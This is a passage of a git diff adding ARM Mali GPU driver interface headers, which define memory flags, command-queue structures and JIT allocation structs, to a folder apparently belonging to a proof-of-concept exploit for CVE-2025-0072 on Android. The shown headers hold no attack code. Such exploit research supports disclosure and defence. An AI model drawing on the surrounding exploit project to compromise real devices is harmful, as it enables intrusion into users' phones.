+#define BASE_MEM_MMU_DUMP_HANDLE (1ul << LOCAL_PAGE_SHIFT)
+#define BASE_MEM_TRACE_BUFFER_HANDLE (2ul << LOCAL_PAGE_SHIFT)
+#define BASE_MEM_MAP_TRACKING_HANDLE (3ul << LOCAL_PAGE_SHIFT)
+#define BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE (4ul << LOCAL_PAGE_SHIFT)
+/* reserved handles ..-47<<PAGE_SHIFT for future special handles */
+#define BASE_MEM_COOKIE_BASE (64ul << LOCAL_PAGE_SHIFT)
+#define BASE_MEM_FIRST_FREE_ADDRESS ((BITS_PER_LONG << LOCAL_PAGE_SHIFT) + BASE_MEM_COOKIE_BASE)
+
+/* Flags to pass to ::base_context_init.
+ * Flags can be ORed together to enable multiple things.
+ *
+ * These share the same space as BASEP_CONTEXT_FLAG_*, and so must
+ * not collide with them.
+ */
+typedef __u32 base_context_create_flags;
+
+/* Flags for base context */
+
+/* No flags set */
+#define BASE_CONTEXT_CREATE_FLAG_NONE ((base_context_create_flags)0)
+
+/* Base context is embedded in a cctx object (flag used for CINSTR
+ * software counter macros)
+ */
+#define BASE_CONTEXT_CCTX_EMBEDDED ((base_context_create_flags)1 << 0)
+
+/* Base context is a 'System Monitor' context for Hardware counters.
+ *
+ * One important side effect of this is that job submission is disabled.
+ */
+#define BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED ((base_context_create_flags)1 << 1)
+
+/* Bit-shift used to encode a memory group ID in base_context_create_flags
+ */
+#define BASEP_CONTEXT_MMU_GROUP_ID_SHIFT (3)
+
+/* Bitmask used to encode a memory group ID in base_context_create_flags
+ */
+#define BASEP_CONTEXT_MMU_GROUP_ID_MASK \
+	((base_context_create_flags)0xF << BASEP_CONTEXT_MMU_GROUP_ID_SHIFT)
+
+/* Bitpattern describing the base_context_create_flags that can be
+ * passed to the kernel
+ */
+#define BASEP_CONTEXT_CREATE_KERNEL_FLAGS \
+	(BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED | BASEP_CONTEXT_MMU_GROUP_ID_MASK)
+
+/* Flags for base tracepoint
+ */
+
+/* Enable additional tracepoints for latency measurements (TL_ATOM_READY,
+ * TL_ATOM_DONE, TL_ATOM_PRIO_CHANGE, TL_ATOM_EVENT_POST)
+ */
+#define BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS (1 << 0)
+
+/* Indicate that job dumping is enabled. This could affect certain timers
+ * to account for the performance impact.
+ */
+#define BASE_TLSTREAM_JOB_DUMPING_ENABLED (1 << 1)
+
+#endif /* _UAPI_BASE_COMMON_KERNEL_H_ */
diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/mali_base_csf_kernel.h b/SecurityExploits/Android/Mali/CVE-2025-0072/mali_base_csf_kernel.h
new file mode 100644
index 0000000..141b090
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE-2025-0072/mali_base_csf_kernel.h
@@ -0,0 +1,608 @@
+/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
+/*
+ *
+ * (C) COPYRIGHT 2020-2023 ARM Limited. All rights reserved.
+ *
+ * This program is free software and is provided to you under the terms of the
+ * GNU General Public License version 2 as published by the Free Software
+ * Foundation, and any use by you of this program is subject to the terms
+ * of such GNU license.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, you can access it online at
+ * http://www.gnu.org/licenses/gpl-2.0.html.
+ *
+ */
+
+#ifndef _UAPI_BASE_CSF_KERNEL_H_
+#define _UAPI_BASE_CSF_KERNEL_H_
+
+#include <linux/types.h>
+#include "mali_base_common_kernel.h"
+
+/* Memory allocation, access/hint flags & mask specific to CSF GPU.
+ *
+ * See base_mem_alloc_flags.
+ */
+
+/* Must be FIXED memory. */
+#define BASE_MEM_FIXED ((base_mem_alloc_flags)1 << 8)
+
+/* CSF event memory
+ *
+ * If Outer shareable coherence is not specified or not available, then on
+ * allocation kbase will automatically use the uncached GPU mapping.
+ * There is no need for the client to specify BASE_MEM_UNCACHED_GPU
+ * themselves when allocating memory with the BASE_MEM_CSF_EVENT flag.
+ *
+ * This memory requires a permanent mapping
+ *
+ * See also kbase_reg_needs_kernel_mapping()
+ */
+#define BASE_MEM_CSF_EVENT ((base_mem_alloc_flags)1 << 19)
+
+#define BASE_MEM_RESERVED_BIT_20 ((base_mem_alloc_flags)1 << 20)
+
+
+/* Must be FIXABLE memory: its GPU VA will be determined at a later point,
+ * at which time it will be at a fixed GPU VA.
+ */
+#define BASE_MEM_FIXABLE ((base_mem_alloc_flags)1 << 29)
+
+/* Note that the number of bits used for base_mem_alloc_flags
+ * must be less than BASE_MEM_FLAGS_NR_BITS !!!
+ */
+
+/* A mask of all the flags which are only valid for allocations within kbase,
+ * and may not be passed from user space.
+ */
+#define BASEP_MEM_FLAGS_KERNEL_ONLY \
+	(BASEP_MEM_PERMANENT_KERNEL_MAPPING | BASEP_MEM_NO_USER_FREE)
+
+/* A mask of all currently reserved flags
+ */
+#define BASE_MEM_FLAGS_RESERVED BASE_MEM_RESERVED_BIT_20
+
+/* Special base mem handles specific to CSF.
+ */
+#define BASEP_MEM_CSF_USER_REG_PAGE_HANDLE (47ul << LOCAL_PAGE_SHIFT)
+#define BASEP_MEM_CSF_USER_IO_PAGES_HANDLE (48ul << LOCAL_PAGE_SHIFT)
+
+#define KBASE_CSF_NUM_USER_IO_PAGES_HANDLE \
+	((BASE_MEM_COOKIE_BASE - BASEP_MEM_CSF_USER_IO_PAGES_HANDLE) >> \
+	 LOCAL_PAGE_SHIFT)
+
+/* Valid set of just-in-time memory allocation flags */
+#define BASE_JIT_ALLOC_VALID_FLAGS ((__u8)0)
+
+/* flags for base context specific to CSF */
+
+/* Base context creates a CSF event notification thread.
+ *
+ * The creation of a CSF event notification thread is conditional but
+ * mandatory for the handling of CSF events.
+ */ +#define BASE_CONTEXT_CSF_EVENT_THREAD ((base_context_create_flags)1 << 2) + +/* Bitpattern describing the ::base_context_create_flags that can be + * passed to base_context_init() + */ +#define BASEP_CONTEXT_CREATE_ALLOWED_FLAGS \ + (BASE_CONTEXT_CCTX_EMBEDDED | \ + BASE_CONTEXT_CSF_EVENT_THREAD | \ + BASEP_CONTEXT_CREATE_KERNEL_FLAGS) + +/* Flags for base tracepoint specific to CSF */ + +/* Enable KBase tracepoints for CSF builds */ +#define BASE_TLSTREAM_ENABLE_CSF_TRACEPOINTS (1 << 2) + +/* Enable additional CSF Firmware side tracepoints */ +#define BASE_TLSTREAM_ENABLE_CSFFW_TRACEPOINTS (1 << 3) + +#define BASE_TLSTREAM_FLAGS_MASK (BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS | \ + BASE_TLSTREAM_JOB_DUMPING_ENABLED | \ + BASE_TLSTREAM_ENABLE_CSF_TRACEPOINTS | \ + BASE_TLSTREAM_ENABLE_CSFFW_TRACEPOINTS) + +/* Number of pages mapped into the process address space for a bound GPU + * command queue. A pair of input/output pages and a Hw doorbell page + * are mapped to enable direct submission of commands to Hw. + */ +#define BASEP_QUEUE_NR_MMAP_USER_PAGES ((size_t)3) + +#define BASE_QUEUE_MAX_PRIORITY (15U) + +/* Sync32 object fields definition */ +#define BASEP_EVENT32_VAL_OFFSET (0U) +#define BASEP_EVENT32_ERR_OFFSET (4U) +#define BASEP_EVENT32_SIZE_BYTES (8U) + +/* Sync64 object fields definition */ +#define BASEP_EVENT64_VAL_OFFSET (0U) +#define BASEP_EVENT64_ERR_OFFSET (8U) +#define BASEP_EVENT64_SIZE_BYTES (16U) + +/* Sync32 object alignment, equal to its size */ +#define BASEP_EVENT32_ALIGN_BYTES (8U) + +/* Sync64 object alignment, equal to its size */ +#define BASEP_EVENT64_ALIGN_BYTES (16U) + +/* The upper limit for number of objects that could be waited/set per command. + * This limit is now enforced as internally the error inherit inputs are + * converted to 32-bit flags in a __u32 variable occupying a previously padding + * field. + */ +#define BASEP_KCPU_CQS_MAX_NUM_OBJS ((size_t)32) + +/* CSF CSI EXCEPTION_HANDLER_FLAGS */ +#define BASE_CSF_TILER_OOM_EXCEPTION_FLAG (1u << 0) +#define BASE_CSF_EXCEPTION_HANDLER_FLAGS_MASK (BASE_CSF_TILER_OOM_EXCEPTION_FLAG) + +/** + * enum base_kcpu_command_type - Kernel CPU queue command type. + * @BASE_KCPU_COMMAND_TYPE_FENCE_SIGNAL: fence_signal, + * @BASE_KCPU_COMMAND_TYPE_FENCE_WAIT: fence_wait, + * @BASE_KCPU_COMMAND_TYPE_CQS_WAIT: cqs_wait, + * @BASE_KCPU_COMMAND_TYPE_CQS_SET: cqs_set, + * @BASE_KCPU_COMMAND_TYPE_CQS_WAIT_OPERATION: cqs_wait_operation, + * @BASE_KCPU_COMMAND_TYPE_CQS_SET_OPERATION: cqs_set_operation, + * @BASE_KCPU_COMMAND_TYPE_MAP_IMPORT: map_import, + * @BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT: unmap_import, + * @BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT_FORCE: unmap_import_force, + * @BASE_KCPU_COMMAND_TYPE_JIT_ALLOC: jit_alloc, + * @BASE_KCPU_COMMAND_TYPE_JIT_FREE: jit_free, + * @BASE_KCPU_COMMAND_TYPE_GROUP_SUSPEND: group_suspend, + * @BASE_KCPU_COMMAND_TYPE_ERROR_BARRIER: error_barrier, + */ +enum base_kcpu_command_type { + BASE_KCPU_COMMAND_TYPE_FENCE_SIGNAL, + BASE_KCPU_COMMAND_TYPE_FENCE_WAIT, + BASE_KCPU_COMMAND_TYPE_CQS_WAIT, + BASE_KCPU_COMMAND_TYPE_CQS_SET, + BASE_KCPU_COMMAND_TYPE_CQS_WAIT_OPERATION, + BASE_KCPU_COMMAND_TYPE_CQS_SET_OPERATION, + BASE_KCPU_COMMAND_TYPE_MAP_IMPORT, + BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT, + BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT_FORCE, + BASE_KCPU_COMMAND_TYPE_JIT_ALLOC, + BASE_KCPU_COMMAND_TYPE_JIT_FREE, + BASE_KCPU_COMMAND_TYPE_GROUP_SUSPEND, + BASE_KCPU_COMMAND_TYPE_ERROR_BARRIER +}; + +/** + * enum base_queue_group_priority - Priority of a GPU Command Queue Group. 
+ * @BASE_QUEUE_GROUP_PRIORITY_HIGH: GPU Command Queue Group is of high + * priority. + * @BASE_QUEUE_GROUP_PRIORITY_MEDIUM: GPU Command Queue Group is of medium + * priority. + * @BASE_QUEUE_GROUP_PRIORITY_LOW: GPU Command Queue Group is of low + * priority. + * @BASE_QUEUE_GROUP_PRIORITY_REALTIME: GPU Command Queue Group is of real-time + * priority. + * @BASE_QUEUE_GROUP_PRIORITY_COUNT: Number of GPU Command Queue Group + * priority levels. + * + * Currently this is in order of highest to lowest, but if new levels are added + * then those new levels may be out of order to preserve the ABI compatibility + * with previous releases. At that point, ensure assignment to + * the 'priority' member in &kbase_queue_group is updated to ensure it remains + * a linear ordering. + * + * There should be no gaps in the enum, otherwise use of + * BASE_QUEUE_GROUP_PRIORITY_COUNT in kbase must be updated. + */ +enum base_queue_group_priority { + BASE_QUEUE_GROUP_PRIORITY_HIGH = 0, + BASE_QUEUE_GROUP_PRIORITY_MEDIUM, + BASE_QUEUE_GROUP_PRIORITY_LOW, + BASE_QUEUE_GROUP_PRIORITY_REALTIME, + BASE_QUEUE_GROUP_PRIORITY_COUNT +}; + +struct base_kcpu_command_fence_info { + __u64 fence; +}; + +struct base_cqs_wait_info { + __u64 addr; + __u32 val; + __u32 padding; +}; + +struct base_kcpu_command_cqs_wait_info { + __u64 objs; + __u32 nr_objs; + __u32 inherit_err_flags; +}; + +struct base_cqs_set { + __u64 addr; +}; + +struct base_kcpu_command_cqs_set_info { + __u64 objs; + __u32 nr_objs; + __u32 padding; +}; + +/** + * typedef basep_cqs_data_type - Enumeration of CQS Data Types + * + * @BASEP_CQS_DATA_TYPE_U32: The Data Type of a CQS Object's value + * is an unsigned 32-bit integer + * @BASEP_CQS_DATA_TYPE_U64: The Data Type of a CQS Object's value + * is an unsigned 64-bit integer + */ +typedef enum PACKED { + BASEP_CQS_DATA_TYPE_U32 = 0, + BASEP_CQS_DATA_TYPE_U64 = 1, +} basep_cqs_data_type; + +/** + * typedef basep_cqs_wait_operation_op - Enumeration of CQS Object Wait + * Operation conditions + * + * @BASEP_CQS_WAIT_OPERATION_LE: CQS Wait Operation indicating that a + * wait will be satisfied when a CQS Object's + * value is Less than or Equal to + * the Wait Operation value + * @BASEP_CQS_WAIT_OPERATION_GT: CQS Wait Operation indicating that a + * wait will be satisfied when a CQS Object's + * value is Greater than the Wait Operation value + */ +typedef enum { + BASEP_CQS_WAIT_OPERATION_LE = 0, + BASEP_CQS_WAIT_OPERATION_GT = 1, +} basep_cqs_wait_operation_op; + +struct base_cqs_wait_operation_info { + __u64 addr; + __u64 val; + __u8 operation; + __u8 data_type; + __u8 padding[6]; +}; + +/** + * struct base_kcpu_command_cqs_wait_operation_info - structure which contains information + * about the Timeline CQS wait objects + * + * @objs: An array of Timeline CQS waits. + * @nr_objs: Number of Timeline CQS waits in the array. + * @inherit_err_flags: Bit-pattern for the CQSs in the array who's error field + * to be served as the source for importing into the + * queue's error-state. 
+ */ +struct base_kcpu_command_cqs_wait_operation_info { + __u64 objs; + __u32 nr_objs; + __u32 inherit_err_flags; +}; + +/** + * typedef basep_cqs_set_operation_op - Enumeration of CQS Set Operations + * + * @BASEP_CQS_SET_OPERATION_ADD: CQS Set operation for adding a value + * to a synchronization object + * @BASEP_CQS_SET_OPERATION_SET: CQS Set operation for setting the value + * of a synchronization object + */ +typedef enum { + BASEP_CQS_SET_OPERATION_ADD = 0, + BASEP_CQS_SET_OPERATION_SET = 1, +} basep_cqs_set_operation_op; + +struct base_cqs_set_operation_info { + __u64 addr; + __u64 val; + __u8 operation; + __u8 data_type; + __u8 padding[6]; +}; + +/** + * struct base_kcpu_command_cqs_set_operation_info - structure which contains information + * about the Timeline CQS set objects + * + * @objs: An array of Timeline CQS sets. + * @nr_objs: Number of Timeline CQS sets in the array. + * @padding: Structure padding, unused bytes. + */ +struct base_kcpu_command_cqs_set_operation_info { + __u64 objs; + __u32 nr_objs; + __u32 padding; +}; + +/** + * struct base_kcpu_command_import_info - structure which contains information + * about the imported buffer. + * + * @handle: Address of imported user buffer. + */ +struct base_kcpu_command_import_info { + __u64 handle; +}; + +/** + * struct base_kcpu_command_jit_alloc_info - structure which contains + * information about jit memory allocation. + * + * @info: An array of elements of the + * struct base_jit_alloc_info type. + * @count: The number of elements in the info array. + * @padding: Padding to a multiple of 64 bits. + */ +struct base_kcpu_command_jit_alloc_info { + __u64 info; + __u8 count; + __u8 padding[7]; +}; + +/** + * struct base_kcpu_command_jit_free_info - structure which contains + * information about jit memory which is to be freed. + * + * @ids: An array containing the JIT IDs to free. + * @count: The number of elements in the ids array. + * @padding: Padding to a multiple of 64 bits. + */ +struct base_kcpu_command_jit_free_info { + __u64 ids; + __u8 count; + __u8 padding[7]; +}; + +/** + * struct base_kcpu_command_group_suspend_info - structure which contains + * suspend buffer data captured for a suspended queue group. + * + * @buffer: Pointer to an array of elements of the type char. + * @size: Number of elements in the @buffer array. + * @group_handle: Handle to the mapping of CSG. + * @padding: padding to a multiple of 64 bits. + */ +struct base_kcpu_command_group_suspend_info { + __u64 buffer; + __u32 size; + __u8 group_handle; + __u8 padding[3]; +}; + + +/** + * struct base_kcpu_command - kcpu command. 
+ * @type: type of the kcpu command, one enum base_kcpu_command_type + * @padding: padding to a multiple of 64 bits + * @info: structure which contains information about the kcpu command; + * actual type is determined by @p type + * @info.fence: Fence + * @info.cqs_wait: CQS wait + * @info.cqs_set: CQS set + * @info.cqs_wait_operation: CQS wait operation + * @info.cqs_set_operation: CQS set operation + * @info.import: import + * @info.jit_alloc: JIT allocation + * @info.jit_free: JIT deallocation + * @info.suspend_buf_copy: suspend buffer copy + * @info.sample_time: sample time + * @info.padding: padding + */ +struct base_kcpu_command { + __u8 type; + __u8 padding[sizeof(__u64) - sizeof(__u8)]; + union { + struct base_kcpu_command_fence_info fence; + struct base_kcpu_command_cqs_wait_info cqs_wait; + struct base_kcpu_command_cqs_set_info cqs_set; + struct base_kcpu_command_cqs_wait_operation_info cqs_wait_operation; + struct base_kcpu_command_cqs_set_operation_info cqs_set_operation; + struct base_kcpu_command_import_info import; + struct base_kcpu_command_jit_alloc_info jit_alloc; + struct base_kcpu_command_jit_free_info jit_free; + struct base_kcpu_command_group_suspend_info suspend_buf_copy; + __u64 padding[2]; /* No sub-struct should be larger */ + } info; +}; + +/** + * struct basep_cs_stream_control - CSI capabilities. + * + * @features: Features of this stream + * @padding: Padding to a multiple of 64 bits. + */ +struct basep_cs_stream_control { + __u32 features; + __u32 padding; +}; + +/** + * struct basep_cs_group_control - CSG interface capabilities. + * + * @features: Features of this group + * @stream_num: Number of streams in this group + * @suspend_size: Size in bytes of the suspend buffer for this group + * @padding: Padding to a multiple of 64 bits. + */ +struct basep_cs_group_control { + __u32 features; + __u32 stream_num; + __u32 suspend_size; + __u32 padding; +}; + +/** + * struct base_gpu_queue_group_error_fatal_payload - Unrecoverable fault + * error information associated with GPU command queue group. + * + * @sideband: Additional information of the unrecoverable fault. + * @status: Unrecoverable fault information. + * This consists of exception type (least significant byte) and + * data (remaining bytes). One example of exception type is + * CS_INVALID_INSTRUCTION (0x49). + * @padding: Padding to make multiple of 64bits + */ +struct base_gpu_queue_group_error_fatal_payload { + __u64 sideband; + __u32 status; + __u32 padding; +}; + +/** + * struct base_gpu_queue_error_fatal_payload - Unrecoverable fault + * error information related to GPU command queue. + * + * @sideband: Additional information about this unrecoverable fault. + * @status: Unrecoverable fault information. + * This consists of exception type (least significant byte) and + * data (remaining bytes). One example of exception type is + * CS_INVALID_INSTRUCTION (0x49). + * @csi_index: Index of the CSF interface the queue is bound to. + * @padding: Padding to make multiple of 64bits + */ +struct base_gpu_queue_error_fatal_payload { + __u64 sideband; + __u32 status; + __u8 csi_index; + __u8 padding[3]; +}; + +/** + * enum base_gpu_queue_group_error_type - GPU Fatal error type. + * + * @BASE_GPU_QUEUE_GROUP_ERROR_FATAL: Fatal error associated with GPU + * command queue group. + * @BASE_GPU_QUEUE_GROUP_QUEUE_ERROR_FATAL: Fatal error associated with GPU + * command queue. + * @BASE_GPU_QUEUE_GROUP_ERROR_TIMEOUT: Fatal error associated with + * progress timeout. 
+ * @BASE_GPU_QUEUE_GROUP_ERROR_TILER_HEAP_OOM: Fatal error due to running out + * of tiler heap memory. + * @BASE_GPU_QUEUE_GROUP_ERROR_FATAL_COUNT: The number of fatal error types + * + * This type is used for &struct_base_gpu_queue_group_error.error_type. + */ +enum base_gpu_queue_group_error_type { + BASE_GPU_QUEUE_GROUP_ERROR_FATAL = 0, + BASE_GPU_QUEUE_GROUP_QUEUE_ERROR_FATAL, + BASE_GPU_QUEUE_GROUP_ERROR_TIMEOUT, + BASE_GPU_QUEUE_GROUP_ERROR_TILER_HEAP_OOM, + BASE_GPU_QUEUE_GROUP_ERROR_FATAL_COUNT +}; + +/** + * struct base_gpu_queue_group_error - Unrecoverable fault information + * @error_type: Error type of @base_gpu_queue_group_error_type + * indicating which field in union payload is filled + * @padding: Unused bytes for 64bit boundary + * @payload: Input Payload + * @payload.fatal_group: Unrecoverable fault error associated with + * GPU command queue group + * @payload.fatal_queue: Unrecoverable fault error associated with command queue + */ +struct base_gpu_queue_group_error { + __u8 error_type; + __u8 padding[7]; + union { + struct base_gpu_queue_group_error_fatal_payload fatal_group; + struct base_gpu_queue_error_fatal_payload fatal_queue; + } payload; +}; + +/** + * enum base_csf_notification_type - Notification type + * + * @BASE_CSF_NOTIFICATION_EVENT: Notification with kernel event + * @BASE_CSF_NOTIFICATION_GPU_QUEUE_GROUP_ERROR: Notification with GPU fatal + * error + * @BASE_CSF_NOTIFICATION_CPU_QUEUE_DUMP: Notification with dumping cpu + * queue + * @BASE_CSF_NOTIFICATION_COUNT: The number of notification type + * + * This type is used for &struct_base_csf_notification.type. + */ +enum base_csf_notification_type { + BASE_CSF_NOTIFICATION_EVENT = 0, + BASE_CSF_NOTIFICATION_GPU_QUEUE_GROUP_ERROR, + BASE_CSF_NOTIFICATION_CPU_QUEUE_DUMP, + BASE_CSF_NOTIFICATION_COUNT +}; + +/** + * struct base_csf_notification - Event or error notification + * + * @type: Notification type of @base_csf_notification_type + * @padding: Padding for 64bit boundary + * @payload: Input Payload + * @payload.align: To fit the struct into a 64-byte cache line + * @payload.csg_error: CSG error + * @payload.csg_error.handle: Handle of GPU command queue group associated with + * fatal error + * @payload.csg_error.padding: Padding + * @payload.csg_error.error: Unrecoverable fault error + * + */ +struct base_csf_notification { + __u8 type; + __u8 padding[7]; + union { + struct { + __u8 handle; + __u8 padding[7]; + struct base_gpu_queue_group_error error; + } csg_error; + + __u8 align[56]; + } payload; +}; + +/** + * struct mali_base_gpu_core_props - GPU core props info + * + * @product_id: Pro specific value. + * @version_status: Status of the GPU release. No defined values, but starts at + * 0 and increases by one for each release status (alpha, beta, EAC, etc.). + * 4 bit values (0-15). + * @minor_revision: Minor release number of the GPU. "P" part of an "RnPn" + * release number. + * 8 bit values (0-255). + * @major_revision: Major release number of the GPU. "R" part of an "RnPn" + * release number. + * 4 bit values (0-15). + * @padding: padding to align to 8-byte + * @gpu_freq_khz_max: The maximum GPU frequency. Reported to applications by + * clGetDeviceInfo() + * @log2_program_counter_size: Size of the shader program counter, in bits. + * @texture_features: TEXTURE_FEATURES_x registers, as exposed by the GPU. This + * is a bitpattern where a set bit indicates that the format is supported. + * Before using a texture format, it is recommended that the corresponding + * bit be checked. 
+ * @gpu_available_memory_size: Theoretical maximum memory available to the GPU.
+ * It is unlikely that a client will be able to allocate all of this memory
+ * for their own purposes, but this at least provides an upper bound on the
+ * memory available to the GPU.
+ * This is required for OpenCL's clGetDeviceInfo() call when
+ * CL_DEVICE_GLOBAL_MEM_SIZE is requested, for OpenCL GPU devices. The
+ * client will not be expecting to allocate anywhere near this value.
+ */
+struct mali_base_gpu_core_props {
+	__u32 product_id;
+	__u16 version_status;
+	__u16 minor_revision;
+	__u16 major_revision;
+	__u16 padding;
+	__u32 gpu_freq_khz_max;
+	__u32 log2_program_counter_size;
+	__u32 texture_features[BASE_GPU_NUM_TEXTURE_FEATURES_REGISTERS];
+	__u64 gpu_available_memory_size;
+};
+
+#endif /* _UAPI_BASE_CSF_KERNEL_H_ */
diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/mali_base_kernel.h b/SecurityExploits/Android/Mali/CVE-2025-0072/mali_base_kernel.h
new file mode 100644
index 0000000..c0b4d50
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE-2025-0072/mali_base_kernel.h
@@ -0,0 +1,287 @@
+/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
+/*
+ *
+ * (C) COPYRIGHT 2010-2022 ARM Limited. All rights reserved.
+ *
+ * This program is free software and is provided to you under the terms of the
+ * GNU General Public License version 2 as published by the Free Software
+ * Foundation, and any use by you of this program is subject to the terms
+ * of such GNU license.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, you can access it online at
+ * http://www.gnu.org/licenses/gpl-2.0.html.
+ *
+ */
+
+/*
+ * Base structures shared with the kernel.
+ */
+
+#ifndef _UAPI_BASE_KERNEL_H_
+#define _UAPI_BASE_KERNEL_H_
+
+#include <linux/types.h>
+
+#define BASE_MAX_COHERENT_GROUPS 16
+
+/* Physical memory group ID for normal usage.
+ */
+#define BASE_MEM_GROUP_DEFAULT (0)
+
+/* Physical memory group ID for explicit SLC allocations.
+ */
+#define BASE_MEM_GROUP_PIXEL_SLC_EXPLICIT (2)
+
+/* Number of physical memory groups.
+ */
+#define BASE_MEM_GROUP_COUNT (16)
+
+/**
+ * typedef base_mem_alloc_flags - Memory allocation, access/hint flags.
+ *
+ * A combination of MEM_PROT/MEM_HINT flags must be passed to each allocator
+ * in order to determine the best cache policy. Some combinations are
+ * of course invalid (e.g. MEM_PROT_CPU_WR | MEM_HINT_CPU_RD),
+ * which defines a write-only region on the CPU side, which is
+ * heavily read by the CPU...
+ * Other flags are only meaningful to a particular allocator.
+ * More flags can be added to this list, as long as they don't clash
+ * (see BASE_MEM_FLAGS_NR_BITS for the number of the first free bit).
+ */
+typedef __u32 base_mem_alloc_flags;
+
+
+struct base_mem_handle {
+	struct {
+		__u64 handle;
+	} basep;
+};
+
+/**
+ * enum base_mem_import_type - Memory types supported by @a base_mem_import
+ *
+ * @BASE_MEM_IMPORT_TYPE_INVALID: Invalid type
+ * @BASE_MEM_IMPORT_TYPE_UMM: UMM import. Handle type is a file descriptor (int)
+ * @BASE_MEM_IMPORT_TYPE_USER_BUFFER: User buffer import. Handle is a
+ * base_mem_import_user_buffer
+ *
+ * Each type defines what the supported handle type is.
+ * + * If any new type is added here ARM must be contacted + * to allocate a numeric value for it. + * Do not just add a new type without synchronizing with ARM + * as future releases from ARM might include other new types + * which could clash with your custom types. + */ +enum base_mem_import_type { + BASE_MEM_IMPORT_TYPE_INVALID = 0, + /* + * Import type with value 1 is deprecated. + */ + BASE_MEM_IMPORT_TYPE_UMM = 2, + BASE_MEM_IMPORT_TYPE_USER_BUFFER = 3 +}; + +/** + * struct base_mem_import_user_buffer - Handle of an imported user buffer + * + * @ptr: address of imported user buffer + * @length: length of imported user buffer in bytes + * + * This structure is used to represent a handle of an imported user buffer. + */ + +struct base_mem_import_user_buffer { + __u64 ptr; + __u64 length; +}; + +/* + * struct base_fence - Cross-device synchronisation fence. + * + * A fence is used to signal when the GPU has finished accessing a resource that + * may be shared with other devices, and also to delay work done asynchronously + * by the GPU until other devices have finished accessing a shared resource. + */ +struct base_fence { + struct { + int fd; + int stream_fd; + } basep; +}; + +/** + * struct base_mem_aliasing_info - Memory aliasing info + * + * @handle: Handle to alias, can be BASE_MEM_WRITE_ALLOC_PAGES_HANDLE + * @offset: Offset within the handle to start aliasing from, in pages. + * Not used with BASE_MEM_WRITE_ALLOC_PAGES_HANDLE. + * @length: Length to alias, in pages. For BASE_MEM_WRITE_ALLOC_PAGES_HANDLE + * specifies the number of times the special page is needed. + * + * Describes a memory handle to be aliased. + * A subset of the handle can be chosen for aliasing, given an offset and a + * length. + * A special handle BASE_MEM_WRITE_ALLOC_PAGES_HANDLE is used to represent a + * region where a special page is mapped with a write-alloc cache setup, + * typically used when the write result of the GPU isn't needed, but the GPU + * must write anyway. + * + * Offset and length are specified in pages. + * Offset must be within the size of the handle. + * Offset+length must not overrun the size of the handle. + */ +struct base_mem_aliasing_info { + struct base_mem_handle handle; + __u64 offset; + __u64 length; +}; + +/* Maximum percentage of just-in-time memory allocation trimming to perform + * on free. + */ +#define BASE_JIT_MAX_TRIM_LEVEL (100) + +/* Maximum number of concurrent just-in-time memory allocations. + */ +#define BASE_JIT_ALLOC_COUNT (255) + +/* base_jit_alloc_info in use for kernel driver versions 10.2 to early 11.5 + * + * jit_version is 1 + * + * Due to the lack of padding specified, user clients between 32 and 64-bit + * may have assumed a different size of the struct + * + * An array of structures was not supported + */ +struct base_jit_alloc_info_10_2 { + __u64 gpu_alloc_addr; + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u8 id; +}; + +/* base_jit_alloc_info introduced by kernel driver version 11.5, and in use up + * to 11.19 + * + * This structure had a number of modifications during and after kernel driver + * version 11.5, but remains size-compatible throughout its version history, and + * with earlier variants compatible with future variants by requiring + * zero-initialization to the unused space in the structure. + * + * jit_version is 2 + * + * Kernel driver version history: + * 11.5: Initial introduction with 'usage_id' and padding[5]. All padding bytes + * must be zero. 
Kbase minor version was not incremented, so some + * versions of 11.5 do not have this change. + * 11.5: Added 'bin_id' and 'max_allocations', replacing 2 padding bytes (Kbase + * minor version not incremented) + * 11.6: Added 'flags', replacing 1 padding byte + * 11.10: Arrays of this structure are supported + */ +struct base_jit_alloc_info_11_5 { + __u64 gpu_alloc_addr; + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u8 id; + __u8 bin_id; + __u8 max_allocations; + __u8 flags; + __u8 padding[2]; + __u16 usage_id; +}; + +/** + * struct base_jit_alloc_info - Structure which describes a JIT allocation + * request. + * @gpu_alloc_addr: The GPU virtual address to write the JIT + * allocated GPU virtual address to. + * @va_pages: The minimum number of virtual pages required. + * @commit_pages: The minimum number of physical pages which + * should back the allocation. + * @extension: Granularity of physical pages to grow the + * allocation by during a fault. + * @id: Unique ID provided by the caller, this is used + * to pair allocation and free requests. + * Zero is not a valid value. + * @bin_id: The JIT allocation bin, used in conjunction with + * @max_allocations to limit the number of each + * type of JIT allocation. + * @max_allocations: The maximum number of allocations allowed within + * the bin specified by @bin_id. Should be the same + * for all allocations within the same bin. + * @flags: flags specifying the special requirements for + * the JIT allocation, see + * %BASE_JIT_ALLOC_VALID_FLAGS + * @padding: Expansion space - should be initialised to zero + * @usage_id: A hint about which allocation should be reused. + * The kernel should attempt to use a previous + * allocation with the same usage_id + * @heap_info_gpu_addr: Pointer to an object in GPU memory describing + * the actual usage of the region. + * + * jit_version is 3. + * + * When modifications are made to this structure, it is still compatible with + * jit_version 3 when: a) the size is unchanged, and b) new members only + * replace the padding bytes. + * + * Previous jit_version history: + * jit_version == 1, refer to 